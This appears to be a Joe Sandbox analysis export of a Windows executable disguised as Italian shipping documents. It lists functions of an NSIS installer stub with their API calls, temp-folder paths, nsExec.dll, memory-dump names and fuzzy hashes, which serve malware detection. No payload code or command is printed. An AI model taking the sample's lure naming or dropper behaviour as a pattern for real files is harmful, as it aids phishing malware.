Function 00401D86 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401D9F
GetClientRect.USER32(?,?), ref: 00401DEA
LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E1A
SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E2E
DeleteObject.GDI32(00000000), ref: 00401E3E

Memory Dump Source

Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 5a50ccc3029d5fde6ea81844b1e337cdf63f6177f9f2d7308e11f2af529302b6
Instruction ID: ff9804e90d7d2423da96771145ec8c84d1acc30631874d8c14b803c0354ed8c3
Opcode Fuzzy Hash: 5a50ccc3029d5fde6ea81844b1e337cdf63f6177f9f2d7308e11f2af529302b6
Instruction Fuzzy Hash: 73210772900119AFCB05DF98EE45AEEBBB5EF08314F14003AF945F62A0D7789D81DB98

Function 00401E53 Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401E56
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E70
MulDiv.KERNEL32(00000000,00000000), ref: 00401E78
ReleaseDC.USER32(?,00000000), ref: 00401E89
CreateFontIndirectW.GDI32(0040CDF0), ref: 00401ED8

Memory Dump Source

Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: ecb0f290f5c1122776e84f7afc2181d255ab8ed52f1adad26d3dddab1dbe2d45
Instruction ID: a825ad976d3f878f3d1ae6f085165680ecf176d60430839047bda31eedf7821d
Opcode Fuzzy Hash: ecb0f290f5c1122776e84f7afc2181d255ab8ed52f1adad26d3dddab1dbe2d45
Instruction Fuzzy Hash: 62017571905240EFE7005BB4EE49BDD3FA4AB15301F10867AF541B61E2C7B904458BED

Function 00404D83 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(0042CA68,0042CA68,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E24
wsprintfW.USER32 ref: 00404E2D
SetDlgItemTextW.USER32(?,0042CA68), ref: 00404E40

Strings

%u.%u%s%s, xrefs: 00404E0E

Memory Dump Source

Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 2c674a3dc48973326ebd454f1002488dce618ddc5f98b18a2ee0300ee1e706a4
Instruction ID: 0fe25742dfe6cfa92c38baccc724587d3b65f537d6828788df476db8ac6fa50e
Opcode Fuzzy Hash: 2c674a3dc48973326ebd454f1002488dce618ddc5f98b18a2ee0300ee1e706a4
Instruction Fuzzy Hash: B111EB336042283BDB109A6DAC45E9E329CDF85374F250237FA65F71D1E978DC2282E8

Function 00405F2E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564

Part of subcall function 00405ED1: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp,?,00405F45,C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp,C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe"), ref: 00405EDF
Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EE4
Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EFC

lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp,C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe"), ref: 00405F87
GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp,C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp,C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp,C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp,C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp,C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp,C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 00405F97

Strings

C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp, xrefs: 00405F34, 00405F39, 00405F3F, 00405F80, 00405F86, 00405F8E, 00405F96
C:\Users\user\AppData\Local\Temp\, xrefs: 00405F2E

Memory Dump Source

Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp
API String ID: 3248276644-71882954
Opcode ID: 7c21406a6ebf8fc224ae0ccc6b020e70a1639b7280e68367676f2d78d50147cb
Instruction ID: 0bce86d1d95a7c790b53086ee47358a3377499fb664fcb231eb74dc800c81f90
Opcode Fuzzy Hash: 7c21406a6ebf8fc224ae0ccc6b020e70a1639b7280e68367676f2d78d50147cb
Instruction Fuzzy Hash: 7AF0F43A105E1269D622733A5C09AAF1555CE86360B5A457BFC91B22C6CF3C8A42CCBE

Function 00405ED1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp,?,00405F45,C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp,C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe"), ref: 00405EDF
CharNextW.USER32(00000000), ref: 00405EE4
CharNextW.USER32(00000000), ref: 00405EFC

Strings

C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp, xrefs: 00405ED2

Memory Dump Source

Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd

Similarity

API ID: CharNext
String ID: C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp
API String ID: 3213498283-1031832637
Opcode ID: a019630038ff328a8ec37a6ad8a5e0fa1ea3fa9b42c133706ff5938ffc5cdd25
Instruction ID: 143c5bdbadb979d876a68ad22b5e9fde56015454fa81a7c55dbcd1e73dec783f
Opcode Fuzzy Hash: a019630038ff328a8ec37a6ad8a5e0fa1ea3fa9b42c133706ff5938ffc5cdd25
Instruction Fuzzy Hash: 03F09072D04A2395DB317B649C45B7756BCEB587A0B54843BE601F72C0DBBC48818ADA

Function 00405E26 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040351F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405E2C
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040351F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405E36
lstrcatW.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405E48

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405E26

Memory Dump Source

Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3081826266
Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
Instruction ID: dcb1dcffde27bcde4b46a4bd7655c85b8e924b1ae314dab144fc932f30a80b76
Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
Instruction Fuzzy Hash: 9DD0A731501534BAC212AB54AD04DDF62AC9F46344381443BF141B30A5C77C5D51D7FD

Function 00402643 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 65stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp\nsExec.dll), ref: 0040269A

Strings

C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp\nsExec.dll, xrefs: 0040265E, 00402683, 00402695, 004026E1
C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp, xrefs: 00402688

Memory Dump Source

Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd

Similarity

API ID: lstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp$C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp\nsExec.dll
API String ID: 1659193697-282007718
Opcode ID: 968f49f8d356fad33376679beb12f00283f02b2e5d5c32db5a7590a3cc778f05
Instruction ID: 71653ae2733df7adc71dfdbaa34589fb2472b89c06e6b839d1f3baa03dac964a
Opcode Fuzzy Hash: 968f49f8d356fad33376679beb12f00283f02b2e5d5c32db5a7590a3cc778f05
Instruction Fuzzy Hash: E011E772A40205BBCB00ABB19E56AAE7671AF50748F21443FF402B71C1EAFD4891565E

Function 0040301E Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,004031FC,00000001), ref: 00403031
GetTickCount.KERNEL32 ref: 0040304F
CreateDialogParamW.USER32(0000006F,00000000,00402F98,00000000), ref: 0040306C
ShowWindow.USER32(00000000,00000005), ref: 0040307A

Memory Dump Source

Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 3e0f77edca3fe8d4731edd858be8c75d6ac57a75eac47466490e255ad15c8a0f
Instruction ID: 9291db8f65f8f9a8906298ccab22143765a9ea5c3e1cf5a275661437a5304794
Opcode Fuzzy Hash: 3e0f77edca3fe8d4731edd858be8c75d6ac57a75eac47466490e255ad15c8a0f
Instruction Fuzzy Hash: 22F08970602A21AFC6306F50FE09A9B7F68FB45B52B51053AF445B11ACCB345C91CB9D

Function 00405550 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0040557F
CallWindowProcW.USER32(?,?,?,?), ref: 004055D0

Part of subcall function 00404522: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404534

Strings

, xrefs: 00405560

Memory Dump Source

Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 831ed5cf29225e66f7bf56ab76169cd98d2ca93c2364028159cf8fc7ca140134
Instruction ID: 994decb8795c597c60d879b60f38f30bda4d2919c1ffc13ce94f3a2918c86729
Opcode Fuzzy Hash: 831ed5cf29225e66f7bf56ab76169cd98d2ca93c2364028159cf8fc7ca140134
Instruction Fuzzy Hash: 1C01717120060CBFEF219F11DD84A9B3B67EB84794F144037FA41761D5C7398D529A6D

Function 73A91948 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

CharNextExA.USER32(?,0000000A,00000000,73A930B8,?,73A916EA,?,00000002,00000002,0000000A), ref: 73A91974

Strings

, xrefs: 73A9195C
, xrefs: 73A91964

Memory Dump Source

Source File: 00000000.00000002.1701148820.0000000073A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 73A90000, based on PE: true

Associated: 00000000.00000002.1701090358.0000000073A90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1701169618.0000000073A92000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1701225152.0000000073A93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1701247983.0000000073A94000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73a90000_Documenti di spedizione 0009333000459595995.jbxd

Similarity

API ID: CharNext
String ID: $
API String ID: 3213498283-227171996
Opcode ID: 19597e2d98042e172a30e88cd35723c25ae878a34e1eab4bbc97b591b59e77a8
Instruction ID: e93dc1661d59a8f2f306953df97a1189c37fba16b36142a323147b768855c767
Opcode Fuzzy Hash: 19597e2d98042e172a30e88cd35723c25ae878a34e1eab4bbc97b591b59e77a8
Instruction Fuzzy Hash: 87F08C310083CE9ADF02CF14C819BEA7FA9AF05204F180088FD859B282C771EA29C7A5

Function 00403B94 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,74DF3420,00000000,C:\Users\user\AppData\Local\Temp\,00403B6C,00403A82,?,?,00000008,0000000A,0000000C), ref: 00403BAE
GlobalFree.KERNEL32(00000000), ref: 00403BB5

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403B94

Memory Dump Source

Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-3081826266
Opcode ID: 522759d04011631da2fa13ba2704cf46823a2ab452b41ebb0ecea140ccdeae61
Instruction ID: cb28855b84c3abb27e6c937247341fa4f051846acd49e0d4b6103447305c23c4
Opcode Fuzzy Hash: 522759d04011631da2fa13ba2704cf46823a2ab452b41ebb0ecea140ccdeae61
Instruction Fuzzy Hash: 5DE0C23362083097C6311F55EE04B1A7778AF89B2AF01402AEC407B2618B74AC538FCC

Function 00405E72 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,004030EE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe,C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe,80000000,00000003), ref: 00405E78
CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,004030EE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe,C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe,80000000,00000003), ref: 00405E88

Strings

C:\Users\user\Desktop, xrefs: 00405E72

Memory Dump Source

Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-224404859
Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
Instruction ID: c6f1eefeac9f22653a6718740f6635ad40246fc98af2d22d27e4b5974eb8f820
Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
Instruction Fuzzy Hash: E1D0A7B3400930EEC312AB04EC04DAF73ACEF123007868827F980A7165D7785D81C6EC

Function 73A91A61 Relevance: 5.0, APIs: 4, Instructions: 45stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,74DEF360,00000000,00000000,?,?,73A91295,00000000,/TIMEOUT=,00000000), ref: 73A91A71
lstrlenW.KERNEL32(?,?,?,73A91295,00000000,/TIMEOUT=,00000000), ref: 73A91A7C
lstrcmpiW.KERNEL32(?,?,?,?,73A91295,00000000,/TIMEOUT=,00000000), ref: 73A91A9A
lstrlenW.KERNEL32(00000000,?,?,73A91295,00000000,/TIMEOUT=,00000000), ref: 73A91AB5

Memory Dump Source

Source File: 00000000.00000002.1701148820.0000000073A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 73A90000, based on PE: true

Associated: 00000000.00000002.1701090358.0000000073A90000.00000002.00000001.01000000.00000005.sdmpDownload File
